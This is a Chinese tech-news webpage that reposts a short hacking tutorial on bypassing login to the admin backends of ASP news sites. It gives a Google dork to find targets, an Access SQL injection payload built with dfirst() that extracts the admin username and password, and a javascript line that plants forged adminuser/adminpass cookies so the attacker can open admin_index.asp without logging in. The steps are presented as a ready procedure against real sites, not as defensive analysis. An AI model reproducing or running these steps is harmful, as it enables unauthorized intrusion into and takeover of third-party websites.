千家信息网

请输入关键字词

热门搜索排行

最新搜索排行

导航: 首页 > 网络安全 >

COOKIES欺骗通杀漏洞进后台

发表于:2025-02-01 作者:千家信息网编辑
千家信息网最后更新 2025年02月01日,在谷歌里搜索:inurl:news_more.asp?lm2=搜索到如下站点:http://www.*********/news_more.asp?lm2=1691.将"/news_more.asp?
千家信息网最后更新 2025年02月01日COOKIES欺骗通杀漏洞进后台

在谷歌里搜索:inurl:news_more.asp?lm2=

搜索到如下站点:http://www.*********/news_more.asp?lm2=169

1.将"/news_more.asp?lm2=169"替换成"/admin/admin_news_pl_view.asp?id=1"

2.将 |'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username=' 粘贴到如下框内,修改保存。


3.




alert([xss_clean]="adminuser=" + escape("1"));alert([xss_clean]="adminpass=" + escape("2")); 代码拷贝进浏览器,回车;(注:标红1处填上图中1内容,2处填上图中2内容)

点击确定。

点击确定。

5.将地址 http://www.*********/admin/admin_news_pl_view.asp?id=1 改成 http://www.*********/admin/admin_index.asp 回车,即可不用登录直接进入后台了。如图,


很赞哦!
上图 内容 搜索 后台 不用 代码 地址 拷贝 浏览器 站点 如图 浏览 登录 漏洞 数据库的安全要保护哪些东西 数据库安全各自的含义是什么 生产安全数据库录入 数据库的安全性及管理 数据库安全策略包含哪些 海淀数据库安全审计系统 建立农村房屋安全信息数据库 易用的数据库客户端支持安全管理 连接数据库失败ssl安全错误 数据库的锁怎样保障安全 单位日常网络安全监测机制 胡润网络安全企业百强 个人学习买多大的云服务器 数据库sql转为api 上海数字藏品软件开发 无法对数据库还原独占访问权 研究生计算机网络安全排名 方舟服务器禁忌 数据库系统工程师前景 怎么检查服务器支持协议 emp 数据库是什么意思 网页服务器地址 剪贴板中的数据库 麒麟操作系统软件开发入门pdf 滨州食品软件开发咨询 网络文明网络安全黑板报 华泰证券软件开发招聘 源城软件开发定制 服务器接收字符串有分隔 服务器怎么访问华为存储 零基础网络安全入门自学书籍 济宁计算机软件开发 如何开发数据库服务器程序 兄弟互联网科技 pki安全服务器的作用 数据库2008还原数据库 网络安全公司怎么运作 大和网络技术有限公司 成都网络安全集中区域 网络安全状况报告

相关文章

0